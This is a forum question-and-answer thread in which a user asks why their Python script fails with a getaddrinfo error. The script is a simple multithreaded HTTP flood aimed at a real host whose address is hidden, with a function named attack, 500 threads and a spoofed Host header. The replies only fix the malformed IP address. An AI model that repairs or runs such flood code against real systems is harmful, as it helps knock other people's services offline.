# Python socket connecting - why do i get this error?

Tags: python, multithreading, sockets

When i run my code i get this error: **s.connect((target, port))**
and **socket.gaierror: [Errno 11001] getaddrinfo failed**

this is my code:

```
import socket
import threading

port = 80
target = ' 127.0.0'
fakeip = '168.192.1.1'

def attack():
    while 5>3:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, port))
        #v prvem oklepaju je sam to da ti spot pise, ne nucas met v kodii
        s.send(('Get /' + target + 'HTTP/1.1\r\n').encode('ascii'), (target, port))
        s.send(('Host:' + fakeip + '\r\n\r\n').encode('ascii'), (target, port))
        s.close()

for i in range(500):
    thread = threading.Thread(target=attack)
    thread.start()
```

The error is in line 9 (s.connect((target, port))

Answer (score 0):

variable "target" should be a real ip address. Like this: "127.0.0.1"

Comment: it is a real ip addres i just covered it up, in my original code i have the correct ip

Comment: And can a IP be from a phone? Is this the problem?

Comment: @gapi31 You covered up the problem.

Comment: Here I have fixed it for you and it still gives me the same error. And i have chacked the IP and it is real

Comment: In variable target incorrect ip address now. It contains a space and forgotten last number. Ip addr should contains 4 numbers split by dot. Try to ping you target ip